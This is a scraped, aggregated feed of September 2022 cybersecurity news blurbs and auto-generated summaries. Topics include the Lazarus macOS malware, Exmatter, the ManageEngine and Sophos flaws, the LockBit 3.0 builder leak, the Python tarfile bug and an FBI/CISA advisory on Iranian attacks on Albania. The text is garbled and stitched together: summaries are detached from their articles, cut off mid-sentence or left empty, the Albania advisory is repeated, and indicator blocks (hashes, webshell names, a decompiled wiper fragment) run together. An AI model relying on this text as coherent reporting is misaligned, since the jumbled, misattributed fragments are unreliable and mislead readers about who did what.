List of files created under the new directory (Sentinel One) The second stage is "WifiAnalyticsServ.app" that loads a persistence agent ("wifianalyticsagent"), which eventually connects to the C2 server at "market.contradecapital[.]com" to fetch the final payload, "WiFiCloudWidget." "North Korea-linked Lazarus APT group is targeting macOS Users searching for jobs in the cryptocurrency industry. North Korea-linked Lazarus APT group continues to target macOS with a malware campaign using job opportunities as a lure. The attackers aimed at stealing credentials for the victims’ wallets. Last week, SentinelOne researchers discovered a decoy documents advertising positions […]
The post North Korea-linked Lazarus continues to target job seekers with macOS malware appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Exploits and vulnerabilities Categories: News The critical CVE-2022-35405 flaw affects several Zoho ManageEngine products. Federal and private organizations must patch now! |
The post Flaw in some ManageEngine apps is being actively exploited, says CISA appeared first on Malwarebytes Labs.
"Autosummary:
"Fortress Information Security and the Oil and Natural Gas Information Sharing Analysis Center (ONG-ISAC) announced an industry-wide initiative focused on securing hardware and software components and supply chains. The software and hardware used by oil and natural gas systems are critical to the industry’s reliable and safe operation. In addition, the supply chains for these products are at increased risk of compromise. Fortress will enable ONG-ISAC members to manage these risks securely and cost-effectively. For … More
The post Fortress Information Security collaborates with ONG-ISAC to improve supply chain cybersecurity appeared first on Help Net Security.
"Autosummary:
“As an industry, we must face today’s cybersecurity challenges as a united front,” said Angela Hahn, executive director of the ONG-ISAC. "The APWG’s Phishing Activity Trends Report reveals that in the second quarter of 2022, the APWG observed 1,097,811 total phishing attacks — the worst quarter for phishing that APWG has ever observed. The total for June was 381,717 attacks or phishing sites. The number of phishing attacks reported has quadrupled since early 2020 — when APWG was observing between 68,000 and 94,000 attacks per month. In the first quarter of 2022, OpSec Security found that … More
The post Phishing attacks skyrocketing, over 1 million observed appeared first on Help Net Security.
"Autosummary:
“We are still seeing fraud coming in via the typical OTT apps (WhatsApp, WeChat, Facebook Messenger, etc.), but the SMS-based fraud is really the kicker here,” Harris said. "Autosummary:
"Ransomware operators switch to new extortion tactics by using the Exmatter malware and adding new data corruption functionality. The data extortion landscape is constantly evolving and threat actors are devising new extortion techniques, this is the case of threat actors using the Exmatter malware. Cyderes Special Operations and Stairwell Threat Research researchers spotted a sample […]
The post Exmatter exfiltration tool used to implement new extortion tactics appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Ransomware gangs are planning on trying out a new tactic, and it involves the destruction of the victims’ data. Targeting the data Researchers from Symantec, Cyderes and Stairwell have recently analyzed a new version of the Exmatter data exfiltration tool and have spotted a new capability: data corruption. Used in conjunction with multi-platform ALPHV (aka BlackCat, aka Noberus) ransomware, this Exmatter sample takes specific file types from selected directories and uploads them to attacker-controlled servers. … More
The post To encrypt or to destroy? Ransomware affiliates plan to try the latter appeared first on Help Net Security.
"Autosummary:
Triple extortion (encryption + data exfiltration and the threat of data leaking + DDoS attack aimed at disrupting targets’ services) The no-encryption approach + offer to share information on how the target was breached This latest approach of corrupting data and asking for money to return it to the victim might work in some cases, especially if the victim organization does not have a good plan to recover from data loss or does not follow data backup best practices. "Sophos has patched an actively exploited remote code execution vulnerability (CVE-2022-3236) in its Firewall solutions, and has pushed the fix to customers who have automatic installation of hotfixes enabled. If this news triggers a feeling of déjà vu, there’s a good reason: earlier this year, another zero-day (CVE-2022-1040) in the same component was leveraged by attackers against “a small set of specific organizations, primarily in the South Asia region” – and this time around is … More
The post RCE in Sophos Firewall is being exploited in the wild (CVE-2022-3236) appeared first on Help Net Security.
"Autosummary:
If this news triggers a feeling of déjà vu, there’s a good reason: earlier this year, another zero-day (CVE-2022-1040) in the same component was leveraged by attackers against “a small set of specific organizations, primarily in the South Asia region” – and this time around is the same. "Autosummary:
BlackCat, also known by the names ALPHV and Noberus, is attributed to an adversary tracked as Coreid (aka FIN7, Carbanak, or Carbon Spider) and is said to be a rebranded successor of DarkSide and BlackMatter, both of which shut shop last year following a string of high-profile attacks, including that of Colonial Pipeline. "Autosummary:
"Autosummary:
Users of Revolut, the popular banking app, would be wise to be on their guard – as scammers are sending out barrages of SMS text messages, posing as official communications from the financial firm. "Autosummary:
Targeted hot cryptocurrency wallets (Cyfirma) Cold desktop wallets like Exodus, Atomic, Armory, Bitecoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, and Jaxx are also stolen. "Autosummary:
“If a new file is found, the content is downloaded and decrypted through an AES-256-CBC decryption algorithm,” Cluster25 says, adding that "the malware allows remote command execution by allocating a new region of memory and executing the received shellcode by calling a new dedicated thread.” "The Ukrainian military intelligence warns that Russia is planning to escalate cyberattacks targeting Ukraine and Western allies. The Main Directorate of Intelligence of the Ministry of Defence of Ukraine (HUR MO) warns that Russia is planning to escalate cyberattacks targeting the critical infrastructure of Ukraine and western countries. According to the Ukrainian military intelligence service, […]
The post Russia prepares massive cyberattacks on the critical infrastructure of Ukraine and its allies appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Podcast This week on Lock and Code, we speak with Kurtis Minder, CEO of GroupSense, about how a company decides to bring in a ransomware negotiator when it"s hit with the destructive malware. |
The post Calling in the ransomware negotiator, with Kurtis Minder: Lock and Code S03E20 appeared first on Malwarebytes Labs.
"Autosummary:
The negotiator, or negotiators, can work closely with a company"s executives, security staff, legal department, and press handlers to accurately and firmly represent the company"s needs during a ransomware attack. "Categories: News Tags: Windows 11 Tags: Windows 10 Tags: phishing Tags: protection Tags: warning Tags: message Tags: Defender Smartscreen We take a look at a new set of security features for Windows 11, and see what Windows 10 can expect to miss out on. |
The post Windows 11 pulls ahead of Windows 10 in anti-phishing stakes appeared first on Malwarebytes Labs.
"Autosummary:
Organisations can configure Enhanced Phishing Protection to warn uses about password reuse, unsafe apps, and malicious activity, and can and switch the feature"s audit mode on and off, which determines whether sends telemetry about unsafe password events. Anti-phishing tools Enhanced phishing protection, by way of Smartscreen, is the name of the game, and Microsoft is all too happy to explain the changes. "Categories: News Categories: Privacy Twitter says it has fixed a bug that meant users weren"t logged out of active sessions on all devices after manually resetting their passwords. |
The post Twitter fixes bug that left devices logged in after password reset appeared first on Malwarebytes Labs.
"Autosummary:
"Veeam Software announced that HBC, a holding company of investments and businesses that operates at the intersection of technology, retail operations and real estate, has chosen Veeam Availability Suite to centralize data protection on premises and across clouds. Veeam helps HBC ensure business continuity, meet internal governance compliance requirements and protect against ransomware. Additionally, HBC saved more than $1 million in a one-time capital expenditure and saves $600,000 in recurring operational expenses annually. From the … More
The post HBC selects Veeam to improve data protection and ransomware resilience appeared first on Help Net Security.
"Autosummary:
It’s the majority owner of iconic e-commerce companies such as Saks, a leading online destination for luxury fashion, Saks OFF 5TH, a premier luxury off-price e-commerce company and The Bay, a Canadian e-commerce marketplace. “To improve upon the customer experience, we began a digital transformation to accelerate our e-commerce business,” said Ope Bakare, Chief Technical Officer, HBC. "GTA 6 in-development footage leaked American video game publisher Rockstar Games has suffered an unfortunate data leak: someone has released online in-development footage/videos for Grand Theft Auto (GTA) 6, the eagerly anticipated instalment of the popular game. Uber says Lapsus$ gang is behind the recent breach Uber has confirmed that the recent breach of its systems started with a compromised account belonging to a contractor. Python tarfile vulnerability affects 350,000 open-source projects (CVE-2007-4559) Trellix Advanced … More
The post Week in review: Revolut data breach, ManageEngine RCE flaw, free Linux security training courses appeared first on Help Net Security.
"Autosummary:
High severity vulnerabilities found in Harbor open-source artifact registry Oxeye security researchers have uncovered several new high severity variants of the IDOR (Insecure Director Object Reference) vulnerabilities (CVE-2022-31671, CVE-2022-31666, CVE-2022-31670, CVE-2022-31669, CVE-2022-31667) in CNCF-graduated project Harbor, the popular open-source artifact registry by VMware. Open-source software usage slowing down for fear of vulnerabilities, exposures, or risks Anaconda released its annual 2022 State of Data Science report, revealing the widespread trends, opportunities, and perceived blockers facing the data science, machine learning (ML), and artificial intelligence (AI) industries. "Autosummary:
Many ransomware operations run as a Ransomware-as-a-Service, where operators/developers are in charge of developing the ransomware, payment site, and handling negotiations, while affiliates join to breach corporate networks, steal data, delete backups, and encrypt devices. "Autosummary:
"Autosummary:
Exempt from encryption are several Microsoft Windows system directories, the boot files, Tor Browser, Internet Explorer, user customizations and settings, the debug log file, or the thumbnail database. "Autosummary:
As American disclosed in the notification letters, personal information exposed in the attack may have included employees" and customers" names, dates of birth, mailing addresses, phone numbers, email addresses, driver"s license numbers, passport numbers, or certain medical information. "Autosummary:
As American disclosed in the notification letters, personal information exposed in the attack may have included employees" and customers" names, dates of birth, mailing addresses, phone numbers, email addresses, driver"s license numbers, passport numbers, or certain medical information. "As students head back into the classroom, K-12 district leaders are faced with the difficult task of preventing and mitigating cybersecurity threats against their districts. School systems have become a popular target for cybercriminals over the last few years due to their growing reliance on technology and their wealth of data. It’s a growing problem that is producing costly ramifications for school districts of all sizes across the country who are already grappling with tight … More
The post Mitigating the cybersecurity crisis for the school year ahead appeared first on Help Net Security.
"Autosummary:
As the school year kicks into high gear, the ongoing cybersecurity crisis should be viewed as a universal problem that is addressed not only by education leaders, but also policymakers and government leaders, education technology partners and vendors, school boards, and community members.On average, it costs education institutions $2.73 million to remediate the impact of a ransomware attack, including the cost of downtime, data recovery, device and network repairs, security updates and lost opportunity. "Autosummary:
"Autosummary:
"The US Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2022-35405, a critical remote code execution vulnerability in ManageEngine PAM360, Password Manager Pro, and Access Manager Plus, to its Known Exploited Vulnerabilities (KEV) Catalog. The details of in-the-wild exploitation of the flaw aren’t available – though, according to data collected by Greynoise, exploitation attempts don’t seem widespread. About CVE-2022-35405 CVE-2022-35405 is a remote code execution vulnerability that can be exploited to execute arbitrary code on … More
The post Critical ManageEngine RCE flaw is being exploited (CVE-2022-35405) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Yes, SLAs can guide performance standards, but when it matters, in a crisis, an SLA will never replicate the urgent sense of "right now" that you have with a dedicated, internal team. Bad for press, bad for finances, bad for security Was there a valid reason other than cost savings for dismissing an entire in-house cybersecurity team?Lack of competence, insider risk, interpersonal issues, lack of communication, or failure to achieve business goals? "Autosummary:
"Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks, SentinelOne researcher Tom Hegel said, adding the targets span Russia, the U.S., the U.K., Taiwan, Brazil, Kazakhstan, Ukraine, Moldova, Georgia, Spain, Central African Republic, and Sudan. "Sansec researchers warn of a surge in hacking attempts targeting a critical Magento 2 vulnerability tracked as CVE-2022-24086. Sansec researchers are warning of a hacking campaign targeting the CVE-2022-24086 Magento 2 vulnerability. Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands of e-stores worldwide. In February, Adobe […]
The post Surge in Magento 2 template attacks exploiting the CVE-2022-24086 flaw appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
DriftingCloud APT exploiting zero-day bug in Sophos Firewall (Volexity) Threat actors have also abused an XG Firewall SQL injection zero-day starting early 2020 with the goal of stealing sensitive data such as usernames and passwords. "CISA added a security flaw in Zoho ManageEngine, tracked as CVE-2022-35405, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a recently disclosed security flaw in Zoho ManageEngine, tracked as CVE-2022-35405 (CVSS score 9.8), to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of […]
The post CISA adds Zoho ManageEngine flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @struppigel, @DanielGallagher, @demonslay335, @malwrhunterteam, @Seifreed, @malwareforme, @fwosar, @BleepinComputer, @FourOctets, @billtoulas, @jorntvdw, @PolarToffee, @Ionut_Ilascu, @VK_Intel, @LawrenceAbrams, @serghei, @S2W_Official, @GeeksCyber, @BroadcomSW, @pcrisk, @3xp0rtblog, @vxunderground, @PogoWasRight, @AhnLab_SecuInfo, and @zscaler. September 20th 2022 The Hive ransomware operation claimed responsibility for an attack on the New York Racing Association (NYRA), which previously disclosed that a cyber attack on June 30, 2022, impacted IT operations and website availability and compromised member data. "Sophos warns that a critical code injection security vulnerability in its Firewall product is actively exploited in the wild. Sophos warns of a critical code injection security vulnerability, tracked as CVE-2022-3236, affecting its Firewall product which is being exploited in the wild. The CVE-2022-3236 flaw resides in the User Portal and Webadmin of Sophos Firewall, […]
The post Sophos warns of a new actively exploited flaw in Firewall product appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Business G2 has released their Fall 2022 reports, ranking Malwarebytes as the leader across a number of endpoint protection categories based on factual customer reviews. |
The post Malwarebytes recognized as endpoint security leader by G2 appeared first on Malwarebytes Labs.
"Autosummary:
Summary Report Malwarebytes has ranked #1 for 4 reports OVERALL across all vendors and market segments Grid Results Index Implementation Index Usability Index Malwarebytes has ranked #1 for 5 Mid-Market reports Results Index Relationship Index Grid report (main report) Implementation Index Usability Index Malwarebytes has ranked #1 for 1 Small Business reports Grid report (main report) Most rapid time to value (TTV) Small- to medium-sized business (SMB) security teams need a solution that is quick to deploy, easy to set-up, and uncomplicated. More resources Malwarebytes receives highest rankings in recent third-party tests Why MRG-Effitas matters to SMBs MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks Why MITRE matters to SMBs "Categories: News Categories: Ransomware Tags: LockBit Tags: builder Tags: leaked The LockBit gang"s latest ransomware builder has been leaked, and we have a copy |
The post A first look at the builder for LockBit 3.0 Black appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 23, 2022 by The LockBit gang"s latest ransomware builder has been leaked, and we have a copy A few months after the LockBit gang released version 3.0 of its ransomware, LockBit 3.0 Black, the builder for it has been leaked by what seems to be a disgruntled developer. "Commvault releases Metallic ThreatWise, an early warning system that proactively surfaces unknown and zero-day threats to minimize compromised data and business impact. According to Enterprise Strategy Group, only 12% of the IT directors surveyed indicated confidence in having the proper tools and necessary location agnostic protection to secure data equally across on-premises and cloud. With ThreatWise, Commvault is further defining data security with an early warning that no other vendor in this space provides. It … More
The post Commvault Metallic ThreatWise proactively detects unknown and zero-day threats appeared first on Help Net Security.
"Autosummary:
"A disgruntled developer seems to be responsible for the leak of the builder for the latest encryptor of the LockBit ransomware gang. The leak of the builder for the latest encryptor of the LockBit ransomware gang made the headlines, it seems that the person who published it is a disgruntled developer. The latest version of […]
The post A disgruntled developer is the alleged source of the leak of the Lockbit 3.0 builder appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Trellix Advanced Research Center published its research into CVE-2007-4559, a vulnerability estimated to be present in over 350,000 open-source projects and prevalent in closed-source projects. Successful exploit The vulnerability exists in the Python tarfile module which is a default module in any project using Python and is found extensively in frameworks created by Netflix, AWS, Intel, Facebook, Google, and applications used for machine learning, automation and docker containerization. The vulnerability can be exploited by uploading … More
The post Python tarfile vulnerability affects 350,000 open-source projects (CVE-2007-4559) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Named "Exmatter," the tool was used since BlackCat"s launch in November 2021 and was heavily updated in August 2022, featuring the following changes: Limit type of files to exfiltrate to: PDF, DOC, DOCX, XLS, PNG, JPG, JPEG, TXT, BMP, RDP, SQL, MSG, PST, ZIP, RTF, IPT, and DWG. "Autosummary:
After a ransomware attack, the company’s day-to-day operations are severely disrupted, meaning that servers are down, products can’t ship, and employees aren’t being paid. "Autosummary:
"More than 350,000 open source projects can be potentially affected by a 15-Year-Old unpatched Python vulnerability More than 350,000 open source projects can be potentially affected by an unpatched Python vulnerability, tracked as CVE-2007-4559 (CVSS score: 6.8), that was discovered 15 years ago. The issue is a Directory traversal vulnerability that resides in the ‘extract’ […]
The post A 15-Year-Old Unpatched Python bug potentially impacts over 350,000 projects appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Threat actors are targeting unpatched Atlassian Confluence servers as part of an ongoing crypto mining campaign. Trend Micro researchers warn of an ongoing crypto mining campaign targeting Atlassian Confluence servers affected by the CVE-2022-26134 vulnerability. The now-patched critical security flaw was disclosed by Atlassian in early June, at the time the company warned of a […]
The post Atlassian Confluence bug CVE-2022-26134 exploited in cryptocurrency mining campaign appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Creating the malicious PHP file (Sansec) Finally, the third attack variation employs template code that executes to replace "generated/code/Magento/Framework/App/FrontController/Interceptor.php" with a malicious, backdoored version. "Autosummary:
Following these campaigns, the FBI and CISA issued two joint advisories (1, 2) warning of APT actors exploiting ManageEngine flaws to drop web shells on the networks of critical infrastructure orgs, including healthcare, electronics, financial services, and IT consulting industries. "Autosummary:
In January, the FBI, CISA, and NSA issued a similar joint advisory, exposing multiple Russian threat groups (including APT29, APT28, and the Sandworm Team) targeting US critical infrastructure organizations." In today"s advisory [PDF], you can find detailed information on how to block threat actors" attacks at every step, including attempts to collect intelligence, gain initial access, or deploy and execute malicious tools in compromised critical infrastructure systems. "Categories: News Tags: 2k games Tags: redline Tags: support Tags: The 2K games support helpdesk was abused to mail a link to download the RedLine infostealing malware to customers whose email address was in the system |
The post 2K games helpdesk abused to spread RedLine malware appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 22, 2022 by The 2K games support helpdesk was abused to mail a link to download the RedLine infostealing malware to customers whose email address was in the system On September 20, 2022, the official Twitter account for 2K Support tweeted an important message from the Customer Support team.From what we managed to put together based on the tweets and what little information 2K provided, the first email looked similar to this one: 2K Support request In some cases, these were followed by a second email that looked similar to this one. "Phosphorus has announced a partnership with Dewpoint. The IT and security solutions provider will act as a value-added reseller (VAR) for Phosphorus in the US market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “xIoT security is a critical need for today’s enterprises, and these risks are left unaddressed by … More
The post Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions appeared first on Help Net Security.
"Autosummary:
"ThreatQuotient has released a new version of ThreatQ TDR Orchestrator, the solution for a simplified, data-driven approach to security operations. Built on the ThreatQ Platform, the continued innovation of ThreatQ TDR Orchestrator includes enhanced automation, analysis and reporting capabilities that accelerate threat detection and response across disparate systems. The latest research from ThreatQuotient, planned for full release later in 2022, shows signs that adoption of security automation is advancing, as budgets in this area are … More
The post ThreatQ TDR Orchestrator addresses industry needs for simpler implementation appeared first on Help Net Security.
"Autosummary:
Atomic Automation allows for immediate action when a complex response is not needed; and Automation Packs for vulnerability prioritization, indicator enrichment, XDR, and more use cases coming soon, help users get started with common use cases quickly. "ActiveState releases ActiveState Artifact Repository to enable organizations to securely build Python dependencies directly from source code. Rather than developers importing prebuilt Python dependencies from a public repository like the Python Package Index (PyPI), or from some internal build process that may not be secured from supply chain attacks, all Python artifacts are created via ActiveState’s secure build service and stored directly in their own private ActiveState Artifact Repository for distribution, creating a closed-loop environment … More
The post ActiveState Artifact Repository reduces the risk of securing Python supply chain appeared first on Help Net Security.
"Autosummary:
Rather than developers importing prebuilt Python dependencies from a public repository like the Python Package Index (PyPI), or from some internal build process that may not be secured from supply chain attacks, all Python artifacts are created via ActiveState’s secure build service and stored directly in their own private ActiveState Artifact Repository for distribution, creating a closed-loop environment that maximizes supply chain security. "Autosummary:
"The US government will award $1 billion in grants to help state, local, and territorial (SLT) governments address cybersecurity risks, strengthen the cybersecurity of their critical infrastructure, and ensure cyber resilience against persistent cyber threats. “Applicants have 60 days to apply for a grant, which can be used to fund new or existing cybersecurity programs,” the US Department of Homeland Security pointed out in the announcement. About the grant program SLT governments face many challenges … More
The post US to award $1B to state, local, and territorial governments to improve cyber resilience appeared first on Help Net Security.
"Autosummary:
The grantees don’t have to adopt a specific cybersecurity framework, but their plan must include how they aim to implement the following seven cybersecurity best practices: Multi-factor authentication; Enhanced logging; Data encryption for data at rest and in transit; End use of unsupported/end of life software and hardware that are accessible from the Internet; Prohibit use of known/fixed/default passwords and credentials; The ability to reconstitute systems (backups); and Migration to the .gov internet domain. "Autosummary:
The guide explains how your organization can design a zero trust implementation strategy, select an appropriate methodology, assemble the right tools, and execute the implementation plan for successful zero trust adoption. The Growth of Zero Trust Recently, zero trust has developed a large following due to a surge in insider attacks and an increase in remote work – both of which challenge the effectiveness of traditional perimeter-based security approaches. By combining multiple defenses such as threat prevention, detection, and automated response, XDR provides a strong foundation to a zero trust strategy. "Autosummary:
"Failure to write any safety code to sanitize the members files before calling for tarfile.extract() tarfile.extractall() results in a directory traversal vulnerability, enabling a bad actor access to the file system" - Charles McFarland, vulnerability researcher in the Trellix Advanced Threat Research team The flaw stems from the fact that code in the extract function in Python"s tarfile module explicitly trusts the information in the TarInfo object "and joins the path that is passed to the extract function and the name in the TarInfo object" CVE-2007-4559 - path joining with filename source: Trellix Less than a week after the disclosure, a message on the Python bug tracker announced that the issue was closed, the fix being updating the documentation with a warning "that it might be dangerous to extract archives from untrusted sources.Trellix Exploiting CVE-2007-4559 In a technical blog post today, Trellix vulnerability researcher Kasimir Schulz, who rediscovered the bug, described the simple steps to exploit CVE-2007-4559 in the Windows version of Spyder IDE, an open-source cross-platform integrated development environment for scientific programming. "Autosummary:
"The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.
In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.
Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.
In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of a "
Autosummary:
SSDeep: 12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx VjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1) File Type: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484], progressive, precision 8, 2484x1752, components 4 Software:For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5 Cert #2 Issuer C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root Cert #2 SHA1 57534ccc33914c41f70e2cbb2103a1db18817d8b Cert #3 Subject C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA Cert #3 Issuer C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. -SHA1 382c18388fb326221dfd7a77ee874f9ba60e04bf Cert #1 Subject C=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation Cert #1 Issuer C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA Cert #1 SHA1 30632ea310114105969d0bda28fdce267104754f Cert #2 Subject C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006SSDeep: 768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX :RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1) File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows PE Header Timestamp: 2016-04-30 17:08:19 ImpHash: 5b2ce9270beea5915ec9adbcd0dbb070 Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC Cert #0 Issuer C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA Cert #0SSDeep 768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1) Filetype PE32+ executable (native) x86-64, for MS Windows PEtype Driver PE Header Timestamp 2016-03-18 14:44:54 ImpHash e233f2cdc91faafe1467d9e52f166213 Cert #0 Subject CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US Cert #0 Issuer CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US Cert #0RawDisk3File = (void *)toOpenRawDisk3File( arg2_WideCharStr, 0xC0000000, L"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"); ptrRawDiskFile = RawDisk3File; if ( RawDisk3File ) { sizeDisk = toGetDiskSize(RawDisk3File); terminal_out("Total Bytez : %lld ", sizeDisk << 9); The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string.User Input disable-defender.exe File Size 292.0 KB (299008 bytes) SHA256 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace SHA1 e866cc6b1507f21f688ecc2ef15a64e413743da7 MD5 60afb1e62ac61424a542b8c7b4d2cf01 SSDeep 6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1) Filetype PE32+ executable (console) x86-64, for MS Windows PEtype EXE PE Header Timestamp 2021-10-24 15:07:32 ImpHash 74a6ef9e7b49c71341e439022f643c8e Revisions September 21, 2022:As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.Note : CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx , error4.aspx , and ClientBin.aspx , to maintain persistence.SHA1 f22a7ec80fbfdc4d8ed796119c76bfac01e0a908 MD5 7b71764236f244ae971742ee1bc6b098 SSDeep 3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1) Filetype PE32+ executable (console) x86-64, for MS Windows PE Header Timestamp 2022-07-15 13:26:28 ImpHash 58d51c1152817ca3dec77f2eee52cbef rwdsk.sys File Size 38.84 KB (39776 bytes) SHA256 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6 SHA1 5e061701b14faf9adec9dd0b2423ff3cfc18764b MD5 8f6e7653807ebb57ecc549cef991d505 "Autosummary:
In the meantime, the threat actors are free to host C2 (command and control) addresses, phishing sites, and malware-dropping points, abusing the good reputation of the hijacked domain to bypass security checks. "Autosummary:
LockBit 3.0 builder files Source: BleepingComputer The included "config.json" can be used to customize an encryptor, including modifying the ransom note, changing configuration options, deciding what processes and services to terminate, and even specifying the command and control server that the encryptor will send data. "Autosummary:
"Once alerted to the problem, our product team resolved the issue and released an update to our web protection database (version 1.0.60360)," added Malwarebytes VP Michael Sherwood in a thread on the company"s forum. "The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.
In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.
Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.
In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of a "
Autosummary:
